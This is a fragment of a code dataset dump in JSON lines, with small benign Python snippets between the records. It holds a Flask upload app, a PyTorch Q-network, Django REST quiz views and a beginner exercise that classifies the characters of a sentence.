request.files['file1']\n            f.save(os.path.join(application.config['UPLOAD_FOLDER1'], secure_filename(f.filename)))\n            counter += 1\n        return \"Uploaded successfully!\"\n    else:\n        if request.method=='POST':\n            f = request.files['file1']\n            f.save(os.path.join(application.config['UPLOAD_FOLDER2'], secure_filename(f.filename)))\n            return \"Uploaded successfully!\"\n\n\n\nif __name__ == \"__main__\":\n    application.run(debug=True, port=8000)\n\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"336483654","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass QNetwork( nn.Module ) :\n\n    def __init__( self, state_size, action_size, fc1_size, fc2_size ) :\n        super( QNetwork, self ).__init__()\n\n        self.fc1 = nn.Linear( state_size, fc1_size )\n        self.fc2 = nn.Linear( fc1_size, fc2_size )\n        self.fc3 = nn.Linear( fc2_size, action_size )\n\n    def forward( self, s ) :\n        # Outputs a vector with all Q-values\n        # for all actions possible\n        x = F.relu( self.fc1( s ) )\n        x = F.relu( self.fc2( x ) )\n        return self.fc3( x )","sub_path":"tutorials/drl_in_a_hurry/_script.py","file_name":"_script.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"611215275","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom .models import Play\nfrom .serializer import PlaySerializer\n\nfrom quiz_questions.models import QuestionAnswers\n\nimport json\n\n# Create your views here.\n@api_view(['GET','POST'])\ndef get_or_add_play(request):\n    try:\n        if request.method == 'GET':\n            obj = Play.objects.all()\n            serializer = PlaySerializer(obj, many=True)\n            return Response(serializer.data)\n        elif request.method == 'POST':\n            data = {\n                'user_name': request.POST.get('user_name'),\n                'quiz': request.POST.get('quiz')\n            }\n            serializer = PlaySerializer(data=data)\n            if serializer.is_valid():\n                serializer.save()\n                return Response(serializer.data, status=status.HTTP_201_CREATED)\n            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n    except Play.DoesNotExist as e:\n        return Response({\"message\":\"Data doesn't exist.\"}, status=status.HTTP_200_OK)\n    except Exception as e:\n        return Response({\"message\": e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET'])\ndef get_play_details(request,pid):\n    try:\n        if request.method == 'GET':\n            obj = Play.objects.get(id=pid)\n            serializer = PlaySerializer(obj)\n            return Response(serializer.data)\n\n    except Play.DoesNotExist as e:\n        return Response({\"message\":\"Data doesn't exist.\"}, status=status.HTTP_200_OK)\n    except Exception as e:\n        return Response({\"message\": e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['POST'])\ndef submit_quiz(request,pid):\n    try:\n        if request.method == 'POST':\n            score = 0\n            for item in request.data['quiz_questions']:\n                qid = item['que_id']\n                ans = item['answer']\n\n                que_obj = QuestionAnswers.objects.get(id=qid)\n                if ans.lower() == que_obj.right_answer.lower():\n                    score += que_obj.marks\n\n            if score > 0:\n                obj = Play.objects.get(id=pid)\n                print(obj)\n                data = {'user_name':obj.user_name, 'score': score, 'quiz': obj.quiz.id}\n                serializer = PlaySerializer(obj, data=data)\n\n                if serializer.is_valid():\n
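# Assuming torch is installed and the QNetwork class above is in scope, a
# quick smoke test of its forward pass (the sizes are arbitrary examples):
import torch

net = QNetwork(state_size=8, action_size=4, fc1_size=64, fc2_size=64)
q_values = net(torch.randn(1, 8))  # batch of one 8-dimensional state
print(q_values.shape)              # torch.Size([1, 4])
print(q_values.argmax(dim=1))      # index of the greedy action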
                    serializer.save()\n                    return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    except Play.DoesNotExist as e:\n        return Response({\"message\":\"Data doesn't exist.\"}, status=status.HTTP_200_OK)\n    except Exception as e:\n        return Response({\"message\": e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n","sub_path":"quiz_project/play_quiz/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"98115525","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/3/5 11:59\n# @Author : lemon_huahua\n# @Email : 204893985@qq.com\n# @File : task_0305.py\n\n# Sample sentence to analyse (deliberately kept in Chinese, it is the test data;\n# it reads roughly \"My name is lemon, I am 5 years old.\"):\ntext='我的是名字是lemon,今年5岁。'\n# digits: 5\n# Chinese: 我的名字是、今年、岁\n# Latin letters: lemon\n# symbols: ,。 Write a program that performs this lexical analysis.\n\ndef analysis(s):\n    number=[] # list that stores the digits\n    ch=[] # list that stores the Chinese characters\n    en=[] # list that stores the Latin letters\n    sign=[] # list that stores the symbols\n    for item in s:\n        if item.isdigit(): # is it a digit?\n            number.append(item)\n        elif item.isalpha(): # is it a letter or a Chinese character?\n            # a Latin letter is still alphabetic after encoding to bytes,\n            # a Chinese character is not\n            if item.encode().isalpha():\n                en.append(item)\n            else:\n                ch.append(item)\n        else:\n            sign.append(item)\n\n    print('digits:',number)\n    print('Chinese:',ch)\n    print('Latin:',en)\n    print('symbols:',sign)\n\nanalysis(text)\n# print('i'.isalpha())\n# print('我'.isalpha())\n# print('i'.encode().isalpha())\n# print('我'.encode().isalpha())\n","sub_path":"week_4/class_0305/task_0305.py","file_name":"task_0305.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
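# A hedged alternative to the per-character loop above: classify the same
# sample with regular expressions (the range \u4e00-\u9fff is an assumption
# covering common CJK ideographs, not every Chinese character):
import re

sample = '我的是名字是lemon,今年5岁。'
print('digits:', re.findall(r'[0-9]', sample))
print('Chinese:', re.findall(r'[\u4e00-\u9fff]+', sample))
print('Latin:', re.findall(r'[A-Za-z]+', sample))
print('symbols:', re.findall(r'[^0-9A-Za-z\u4e00-\u9fff]', sample))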